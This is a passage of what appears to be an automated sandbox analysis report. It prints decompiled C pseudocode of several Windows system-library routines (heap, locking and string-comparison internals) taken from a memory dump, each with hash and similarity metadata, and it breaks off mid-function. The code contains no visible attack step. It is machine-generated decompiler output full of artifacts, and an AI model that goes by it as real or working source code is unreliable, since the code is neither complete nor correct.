                                                    C-Code - Quality: 79%
                                                    			E04BC6DC9(signed int __ecx, void* __edx) {
                                                    				unsigned int _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v40;
                                                    				char _v44;
                                                    				char _v48;
                                                    				char _v52;
                                                    				char _v56;
                                                    				char _v60;
                                                    				void* _t87;
                                                    				void* _t95;
                                                    				signed char* _t96;
                                                    				signed int _t107;
                                                    				signed int _t136;
                                                    				signed char* _t137;
                                                    				void* _t157;
                                                    				void* _t161;
                                                    				void* _t167;
                                                    				intOrPtr _t168;
                                                    				void* _t174;
                                                    				void* _t175;
                                                    				signed int _t176;
                                                    				void* _t177;
                                                    
                                                    				_t136 = __ecx;
                                                    				_v44 = 0;
                                                    				_t167 = __edx;
                                                    				_v40 = 0;
                                                    				_v36 = 0;
                                                    				_v32 = 0;
                                                    				_v60 = 0;
                                                    				_v56 = 0;
                                                    				_v52 = 0;
                                                    				_v48 = 0;
                                                    				_v16 = __ecx;
                                                    				_t87 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                    				_t175 = _t87;
                                                    				if(_t175 != 0) {
                                                    					_t11 = _t175 + 0x30; // 0x30
                                                    					 *((short*)(_t175 + 6)) = 0x14d4;
                                                    					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                    					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                    					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                    					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                    					E04BC6B4C(_t167, _t11, 0x214,  &_v8);
                                                    					_v12 = _v8 + 0x10;
                                                    					_t95 = E04B67D50();
                                                    					_t137 = 0x7ffe0384;
                                                    					if(_t95 == 0) {
                                                    						_t96 = 0x7ffe0384;
                                                    					} else {
                                                    						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    					}
                                                    					_push(_t175);
                                                    					_push(_v12);
                                                    					_push(0x402);
                                                    					_push( *_t96 & 0x000000ff);
                                                    					E04B89AE0();
                                                    					_t87 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                    					_t176 = _v16;
                                                    					if((_t176 & 0x00000100) != 0) {
                                                    						_push( &_v36);
                                                    						_t157 = 4;
                                                    						_t87 = E04BC795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                    						if(_t87 >= 0) {
                                                    							_v24 = E04BC795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                    							_v28 = E04BC795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                    							_push( &_v52);
                                                    							_t161 = 5;
                                                    							_t168 = E04BC795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                    							_v20 = _t168;
                                                    							_t107 = L04B64620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                    							_v16 = _t107;
                                                    							if(_t107 != 0) {
                                                    								_v8 = _v8 & 0x00000000;
                                                    								 *(_t107 + 0x20) = _t176;
                                                    								 *((short*)(_t107 + 6)) = 0x14d5;
                                                    								_t47 = _t107 + 0x24; // 0x24
                                                    								_t177 = _t47;
                                                    								E04BC6B4C( &_v36, _t177, 0xc78,  &_v8);
                                                    								_t51 = _v8 + 4; // 0x4
                                                    								_t178 = _t177 + (_v8 >> 1) * 2;
                                                    								_v12 = _t51;
                                                    								E04BC6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                    								_v12 = _v12 + _v8;
                                                    								E04BC6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                    								_t125 = _v8;
                                                    								_v12 = _v12 + _v8;
                                                    								E04BC6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                    								_t174 = _v12 + _v8;
                                                    								if(E04B67D50() != 0) {
                                                    									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    								}
                                                    								_push(_v16);
                                                    								_push(_t174);
                                                    								_push(0x402);
                                                    								_push( *_t137 & 0x000000ff);
                                                    								E04B89AE0();
                                                    								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                    								_t168 = _v20;
                                                    							}
                                                    							_t87 = L04B62400( &_v36);
                                                    							if(_v24 >= 0) {
                                                    								_t87 = L04B62400( &_v44);
                                                    							}
                                                    							if(_t168 >= 0) {
                                                    								_t87 = L04B62400( &_v52);
                                                    							}
                                                    							if(_v28 >= 0) {
                                                    								return L04B62400( &_v60);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t87;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: d10d5bb4bf6125803e77433c0ea95fde1da3d8a2e8cf21987ac789ae645cd0df
                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: D7716B71A00609EFDB14DFA8C984EEEBBB9FF48718F1045A9E505E7250DB34BA41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E04B452A5(char __ecx) {
                                                    				char _v20;
                                                    				char _v28;
                                                    				char _v29;
                                                    				void* _v32;
                                                    				void* _v36;
                                                    				void* _v37;
                                                    				void* _v38;
                                                    				void* _v40;
                                                    				void* _v46;
                                                    				void* _v64;
                                                    				void* __ebx;
                                                    				intOrPtr* _t49;
                                                    				signed int _t53;
                                                    				short _t85;
                                                    				signed int _t87;
                                                    				signed int _t88;
                                                    				signed int _t89;
                                                    				intOrPtr _t101;
                                                    				intOrPtr* _t102;
                                                    				intOrPtr* _t104;
                                                    				signed int _t106;
                                                    				void* _t108;
                                                    
                                                    				_t93 = __ecx;
                                                    				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                    				_push(_t88);
                                                    				_v29 = __ecx;
                                                    				_t89 = _t88 | 0xffffffff;
                                                    				while(1) {
                                                    					E04B5EEF0(0x4c379a0);
                                                    					_t104 =  *0x4c38210; // 0xc91cc8
                                                    					if(_t104 == 0) {
                                                    						break;
                                                    					}
                                                    					asm("lock inc dword [esi]");
                                                    					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                    					E04B5EB70(_t93, 0x4c379a0);
                                                    					if( *((char*)(_t108 + 0xf)) != 0) {
                                                    						_t101 =  *0x7ffe02dc;
                                                    						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                    						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                    							L9:
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0x90028);
                                                    							_push(_t108 + 0x20);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push( *((intOrPtr*)(_t104 + 4)));
                                                    							_t53 = E04B89890();
                                                    							__eflags = _t53;
                                                    							if(_t53 >= 0) {
                                                    								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                    								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                    									E04B5EEF0(0x4c379a0);
                                                    									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                    									E04B5EB70(0, 0x4c379a0);
                                                    								}
                                                    								goto L3;
                                                    							}
                                                    							__eflags = _t53 - 0xc0000012;
                                                    							if(__eflags == 0) {
                                                    								L12:
                                                    								_t13 = _t104 + 0xc; // 0xc91cd5
                                                    								_t93 = _t13;
                                                    								 *((char*)(_t108 + 0x12)) = 0;
                                                    								__eflags = E04B7F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                    								if(__eflags >= 0) {
                                                    									L15:
                                                    									_t102 = _v28;
                                                    									 *_t102 = 2;
                                                    									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                    									E04B5EEF0(0x4c379a0);
                                                    									__eflags =  *0x4c38210 - _t104; // 0xc91cc8
                                                    									if(__eflags == 0) {
                                                    										__eflags =  *((char*)(_t108 + 0xe));
                                                    										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                    										 *0x4c38210 = _t102;
                                                    										_t32 = _t102 + 0xc; // 0x0
                                                    										 *_t95 =  *_t32;
                                                    										_t33 = _t102 + 0x10; // 0x0
                                                    										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                    										_t35 = _t102 + 4; // 0xffffffff
                                                    										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                    										if(__eflags != 0) {
                                                    											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                    											E04BC4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                    										}
                                                    										E04B5EB70(_t95, 0x4c379a0);
                                                    										asm("lock xadd [esi], eax");
                                                    										if(__eflags == 0) {
                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                    											E04B895D0();
                                                    											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                    										}
                                                    										asm("lock xadd [esi], ebx");
                                                    										__eflags = _t89 == 1;
                                                    										if(_t89 == 1) {
                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                    											E04B895D0();
                                                    											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                    										}
                                                    										_t49 = _t102;
                                                    										L4:
                                                    										return _t49;
                                                    									}
                                                    									E04B5EB70(_t93, 0x4c379a0);
                                                    									asm("lock xadd [esi], eax");
                                                    									if(__eflags == 0) {
                                                    										_push( *((intOrPtr*)(_t104 + 4)));
                                                    										E04B895D0();
                                                    										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                    										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                    									}
                                                    									 *_t102 = 1;
                                                    									asm("lock xadd [edi], eax");
                                                    									if(__eflags == 0) {
                                                    										_t28 = _t102 + 4; // 0xffffffff
                                                    										_push( *_t28);
                                                    										E04B895D0();
                                                    										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                    									}
                                                    									continue;
                                                    								}
                                                    								_t93 =  &_v20;
                                                    								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                    								_t85 = 6;
                                                    								_v20 = _t85;
                                                    								_t87 = E04B7F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                    								__eflags = _t87;
                                                    								if(_t87 < 0) {
                                                    									goto L3;
                                                    								}
                                                    								 *((char*)(_t108 + 0xe)) = 1;
                                                    								goto L15;
                                                    							}
                                                    							__eflags = _t53 - 0xc000026e;
                                                    							if(__eflags != 0) {
                                                    								goto L3;
                                                    							}
                                                    							goto L12;
                                                    						}
                                                    						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                    						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                    							goto L3;
                                                    						} else {
                                                    							goto L9;
                                                    						}
                                                    					}
                                                    					L3:
                                                    					_t49 = _t104;
                                                    					goto L4;
                                                    				}
                                                    				_t49 = 0;
                                                    				goto L4;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 2e6d8a60d2854a275487a7edb414e9f297f8820c52d4ff882679e4f6198de395
                                                    • Instruction ID: 44c1ed2f15f02d99d5add3b23f4426a456a754fa179647e36399d7fe51e27a4f
                                                    • Opcode Fuzzy Hash: 2e6d8a60d2854a275487a7edb414e9f297f8820c52d4ff882679e4f6198de395
                                                    • Instruction Fuzzy Hash: A851D071205741AFEB21EF24C840B27BBE4FF80718F1449AEE59597A50E774F850DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B72AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                    				signed short* _v8;
                                                    				signed short* _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr* _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				short _t56;
                                                    				signed int _t57;
                                                    				intOrPtr _t58;
                                                    				signed short* _t61;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t75;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t87;
                                                    				intOrPtr* _t90;
                                                    				signed short* _t91;
                                                    				signed int _t95;
                                                    				signed short* _t96;
                                                    				intOrPtr _t97;
                                                    				intOrPtr _t102;
                                                    				signed int _t108;
                                                    				intOrPtr _t110;
                                                    				signed int _t111;
                                                    				signed short* _t112;
                                                    				void* _t113;
                                                    				signed int _t116;
                                                    				signed short** _t119;
                                                    				short* _t120;
                                                    				signed int _t123;
                                                    				signed int _t124;
                                                    				void* _t125;
                                                    				intOrPtr _t127;
                                                    				signed int _t128;
                                                    
                                                    				_t90 = __ecx;
                                                    				_v16 = __edx;
                                                    				_t108 = _a4;
                                                    				_v28 = __ecx;
                                                    				_t4 = _t108 - 1; // -1
                                                    				if(_t4 > 0x13) {
                                                    					L15:
                                                    					_t56 = 0xc0000100;
                                                    					L16:
                                                    					return _t56;
                                                    				}
                                                    				_t57 = _t108 * 0x1c;
                                                    				_v32 = _t57;
                                                    				_t6 = _t57 + 0x4c38204; // 0x0
                                                    				_t123 =  *_t6;
                                                    				_t7 = _t57 + 0x4c38208; // 0x4c38207
                                                    				_t8 = _t57 + 0x4c38208; // 0x4c38207
                                                    				_t119 = _t8;
                                                    				_v36 = _t123;
                                                    				_t110 = _t7 + _t123 * 8;
                                                    				_v24 = _t110;
                                                    				_t111 = _a4;
                                                    				if(_t119 >= _t110) {
                                                    					L12:
                                                    					if(_t123 != 3) {
                                                    						_t58 =  *0x4c38450; // 0xc93c80
                                                    						if(_t58 == 0) {
                                                    							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                    						}
                                                    					} else {
                                                    						_t26 = _t57 + 0x4c3821c; // 0x0
                                                    						_t58 =  *_t26;
                                                    					}
                                                    					 *_t90 = _t58;
                                                    					goto L15;
                                                    				} else {
                                                    					goto L2;
                                                    				}
                                                    				while(1) {
                                                    					_t116 =  *_t61 & 0x0000ffff;
                                                    					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                    					if(_t116 == _t128) {
                                                    						goto L18;
                                                    					}
                                                    					L5:
                                                    					if(_t116 >= 0x61) {
                                                    						if(_t116 > 0x7a) {
                                                    							_t97 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t72 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t75 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                    						} else {
                                                    							_t116 = _t116 - 0x20;
                                                    						}
                                                    					}
                                                    					if(_t128 >= 0x61) {
                                                    						if(_t128 > 0x7a) {
                                                    							_t102 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t84 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t87 =  *0x4c36d5c; // 0x7f1e0654
                                                    							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                    						} else {
                                                    							_t128 = _t128 - 0x20;
                                                    						}
                                                    					}
                                                    					if(_t116 == _t128) {
                                                    						_t61 = _v12;
                                                    						_t96 = _v8;
                                                    					} else {
                                                    						_t113 = _t116 - _t128;
                                                    						L9:
                                                    						_t111 = _a4;
                                                    						if(_t113 == 0) {
                                                    							_t115 =  &(( *_t119)[_t111 + 1]);
                                                    							_t33 =  &(_t119[1]); // 0x100
                                                    							_t120 = _a8;
                                                    							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                    							_t35 = _t95 - 1; // 0xff
                                                    							_t124 = _t35;
                                                    							if(_t120 == 0) {
                                                    								L27:
                                                    								 *_a16 = _t95;
                                                    								_t56 = 0xc0000023;
                                                    								goto L16;
                                                    							}
                                                    							if(_t124 >= _a12) {
                                                    								if(_a12 >= 1) {
                                                    									 *_t120 = 0;
                                                    								}
                                                    								goto L27;
                                                    							}
                                                    							 *_a16 = _t124;
                                                    							_t125 = _t124 + _t124;
                                                    							E04B8F3E0(_t120, _t115, _t125);
                                                    							_t56 = 0;
                                                    							 *((short*)(_t125 + _t120)) = 0;
                                                    							goto L16;
                                                    						}
                                                    						_t119 =  &(_t119[2]);
                                                    						if(_t119 < _v24) {
                                                    							L2:
                                                    							_t91 =  *_t119;
                                                    							_t61 = _t91;
                                                    							_v12 = _t61;
                                                    							_t112 =  &(_t61[_t111]);
                                                    							_v8 = _t112;
                                                    							if(_t61 >= _t112) {
                                                    								break;
                                                    							} else {
                                                    								_t127 = _v16 - _t91;
                                                    								_t96 = _t112;
                                                    								_v20 = _t127;
                                                    								_t116 =  *_t61 & 0x0000ffff;
                                                    								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                    								if(_t116 == _t128) {
                                                    									goto L18;
                                                    								}
                                                    								goto L5;
                                                    							}
                                                    						} else {
                                                    							_t90 = _v28;
                                                    							_t57 = _v32;
                                                    							_t123 = _v36;
                                                    							goto L12;
                                                    						}
                                                    					}
                                                    					L18:
                                                    					_t61 =  &(_t61[1]);
                                                    					_v12 = _t61;
                                                    					if(_t61 >= _t96) {
                                                    						break;
                                                    					}
                                                    					_t127 = _v20;
                                                    				}
                                                    				_t113 = 0;
                                                    				goto L9;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 455d71482bcfdf23595ceaabd9a05acf1d05c82ec7cbccaa74ffe964a9c1dabb
                                                    • Instruction ID: fafb3e603beab7aced400da9f41e469e6e84ca4e1a93475c1a3cc095e4436d71
                                                    • Opcode Fuzzy Hash: 455d71482bcfdf23595ceaabd9a05acf1d05c82ec7cbccaa74ffe964a9c1dabb
                                                    • Instruction Fuzzy Hash: D3519D7AB00125CFCB28DF18C8909BDB7B1FB8870171585DAE866AB354E734BA51DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E04B6DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				char _v5;
                                                    				signed int _v12;
                                                    				signed int* _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				intOrPtr _v44;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				signed int _t54;
                                                    				char* _t58;
                                                    				signed int _t66;
                                                    				intOrPtr _t67;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t73;
                                                    				signed int* _t75;
                                                    				intOrPtr _t79;
                                                    				intOrPtr _t80;
                                                    				char _t82;
                                                    				signed int _t83;
                                                    				signed int _t84;
                                                    				signed int _t88;
                                                    				signed int _t89;
                                                    				intOrPtr _t90;
                                                    				intOrPtr _t92;
                                                    				signed int _t97;
                                                    				intOrPtr _t98;
                                                    				intOrPtr* _t99;
                                                    				signed int* _t101;
                                                    				signed int* _t102;
                                                    				intOrPtr* _t103;
                                                    				intOrPtr _t105;
                                                    				signed int _t106;
                                                    				void* _t118;
                                                    
                                                    				_t92 = __edx;
                                                    				_t75 = _a4;
                                                    				_t98 = __ecx;
                                                    				_v44 = __edx;
                                                    				_t106 = _t75[1];
                                                    				_v40 = __ecx;
                                                    				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                    					_t82 = 0;
                                                    				} else {
                                                    					_t82 = 1;
                                                    				}
                                                    				_v5 = _t82;
                                                    				_t6 = _t98 + 0xc8; // 0xc9
                                                    				_t101 = _t6;
                                                    				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                    				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                    				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                    				if(_t82 != 0) {
                                                    					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                    					_t83 =  *_t75;
                                                    					_t54 = _t75[1];
                                                    					 *_t101 = _t83;
                                                    					_t84 = _t83 | _t54;
                                                    					_t101[1] = _t54;
                                                    					if(_t84 == 0) {
                                                    						_t101[1] = _t101[1] & _t84;
                                                    						 *_t101 = 1;
                                                    					}
                                                    					goto L19;
                                                    				} else {
                                                    					if(_t101 == 0) {
                                                    						E04B4CC50(E04B44510(0xc000000d));
                                                    						_t88 =  *_t101;
                                                    						_t97 = _t101[1];
                                                    						L15:
                                                    						_v12 = _t88;
                                                    						_t66 = _t88 -  *_t75;
                                                    						_t89 = _t97;
                                                    						asm("sbb ecx, [ebx+0x4]");
                                                    						_t118 = _t89 - _t97;
                                                    						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                    							_t66 = _t66 | 0xffffffff;
                                                    							_t89 = 0x7fffffff;
                                                    						}
                                                    						 *_t101 = _t66;
                                                    						_t101[1] = _t89;
                                                    						L19:
                                                    						if(E04B67D50() != 0) {
                                                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    						} else {
                                                    							_t58 = 0x7ffe0386;
                                                    						}
                                                    						_t102 = _v16;
                                                    						if( *_t58 != 0) {
                                                    							_t58 = E04C18ED6(_t102, _t98);
                                                    						}
                                                    						_t76 = _v44;
                                                    						E04B62280(_t58, _v44);
                                                    						E04B6DD82(_v44, _t102, _t98);
                                                    						E04B6B944(_t102, _v5);
                                                    						return E04B5FFB0(_t76, _t98, _t76);
                                                    					}
                                                    					_t99 = 0x7ffe03b0;
                                                    					do {
                                                    						_t103 = 0x7ffe0010;
                                                    						do {
                                                    							_t67 =  *0x4c38628; // 0x0
                                                    							_v28 = _t67;
                                                    							_t68 =  *0x4c3862c; // 0x0
                                                    							_v32 = _t68;
                                                    							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                    							_v20 =  *_t99;
                                                    							while(1) {
                                                    								_t97 =  *0x7ffe000c;
                                                    								_t90 =  *0x7FFE0008;
                                                    								if(_t97 ==  *_t103) {
                                                    									goto L10;
                                                    								}
                                                    								asm("pause");
                                                    							}
                                                    							L10:
                                                    							_t79 = _v24;
                                                    							_t99 = 0x7ffe03b0;
                                                    							_v12 =  *0x7ffe03b0;
                                                    							_t72 =  *0x7FFE03B4;
                                                    							_t103 = 0x7ffe0010;
                                                    							_v36 = _t72;
                                                    						} while (_v20 != _v12 || _t79 != _t72);
                                                    						_t73 =  *0x4c38628; // 0x0
                                                    						_t105 = _v28;
                                                    						_t80 =  *0x4c3862c; // 0x0
                                                    					} while (_t105 != _t73 || _v32 != _t80);
                                                    					_t98 = _v40;
                                                    					asm("sbb edx, [ebp-0x20]");
                                                    					_t88 = _t90 - _v12 - _t105;
                                                    					_t75 = _a4;
                                                    					asm("sbb edx, eax");
                                                    					_t31 = _t98 + 0xc8; // 0x4c0fb53
                                                    					_t101 = _t31;
                                                    					 *_t101 = _t88;
                                                    					_t101[1] = _t97;
                                                    					goto L15;
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 341d5cc64674a32cf0cfb11fc93b60a7430e89450ae2fe3297b5aa05f758bb17
                                                    • Instruction ID: 66f3c85341bb7b805991882f86aa841602b9bbf4643971b9e37cb97899fe8248
                                                    • Opcode Fuzzy Hash: 341d5cc64674a32cf0cfb11fc93b60a7430e89450ae2fe3297b5aa05f758bb17
                                                    • Instruction Fuzzy Hash: 9B51BD71B01619DFCB14DF68C480AAEFBF9FB48310F20859AD956A7340EB79B944CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E04B5EF40(intOrPtr __ecx) {
                                                    				char _v5;
                                                    				char _v6;
                                                    				char _v7;
                                                    				char _v8;
                                                    				signed int _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t58;
                                                    				char _t59;
                                                    				signed char _t69;
                                                    				void* _t73;
                                                    				signed int _t74;
                                                    				char _t79;
                                                    				signed char _t81;
                                                    				signed int _t85;
                                                    				signed int _t87;
                                                    				intOrPtr _t90;
                                                    				signed char* _t91;
                                                    				void* _t92;
                                                    				signed int _t94;
                                                    				void* _t96;
                                                    
                                                    				_t90 = __ecx;
                                                    				_v16 = __ecx;
                                                    				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                    					_t58 =  *((intOrPtr*)(__ecx));
                                                    					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                    						E04B49080(_t73, __ecx, __ecx, _t92);
                                                    					}
                                                    				}
                                                    				_t74 = 0;
                                                    				_t96 =  *0x7ffe036a - 1;
                                                    				_v12 = 0;
                                                    				_v7 = 0;
                                                    				if(_t96 > 0) {
                                                    					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                    					_v12 = _t74;
                                                    					_v7 = _t96 != 0;
                                                    				}
                                                    				_t79 = 0;
                                                    				_v8 = 0;
                                                    				_v5 = 0;
                                                    				while(1) {
                                                    					L4:
                                                    					_t59 = 1;
                                                    					L5:
                                                    					while(1) {
                                                    						if(_t59 == 0) {
                                                    							L12:
                                                    							_t21 = _t90 + 4; // 0x77dfc21e
                                                    							_t87 =  *_t21;
                                                    							_v6 = 0;
                                                    							if(_t79 != 0) {
                                                    								if((_t87 & 0x00000002) != 0) {
                                                    									goto L19;
                                                    								}
                                                    								if((_t87 & 0x00000001) != 0) {
                                                    									_v6 = 1;
                                                    									_t74 = _t87 ^ 0x00000003;
                                                    								} else {
                                                    									_t51 = _t87 - 2; // -2
                                                    									_t74 = _t51;
                                                    								}
                                                    								goto L15;
                                                    							} else {
                                                    								if((_t87 & 0x00000001) != 0) {
                                                    									_v6 = 1;
                                                    									_t74 = _t87 ^ 0x00000001;
                                                    								} else {
                                                    									_t26 = _t87 - 4; // -4
                                                    									_t74 = _t26;
                                                    									if((_t74 & 0x00000002) == 0) {
                                                    										_t74 = _t74 - 2;
                                                    									}
                                                    								}
                                                    								L15:
                                                    								if(_t74 == _t87) {
                                                    									L19:
                                                    									E04B42D8A(_t74, _t90, _t87, _t90);
                                                    									_t74 = _v12;
                                                    									_v8 = 1;
                                                    									if(_v7 != 0 && _t74 > 0x64) {
                                                    										_t74 = _t74 - 1;
                                                    										_v12 = _t74;
                                                    									}
                                                    									_t79 = _v5;
                                                    									goto L4;
                                                    								}
                                                    								asm("lock cmpxchg [esi], ecx");
                                                    								if(_t87 != _t87) {
                                                    									_t74 = _v12;
                                                    									_t59 = 0;
                                                    									_t79 = _v5;
                                                    									continue;
                                                    								}
                                                    								if(_v6 != 0) {
                                                    									_t74 = _v12;
                                                    									L25:
                                                    									if(_v7 != 0) {
                                                    										if(_t74 < 0x7d0) {
                                                    											if(_v8 == 0) {
                                                    												_t74 = _t74 + 1;
                                                    											}
                                                    										}
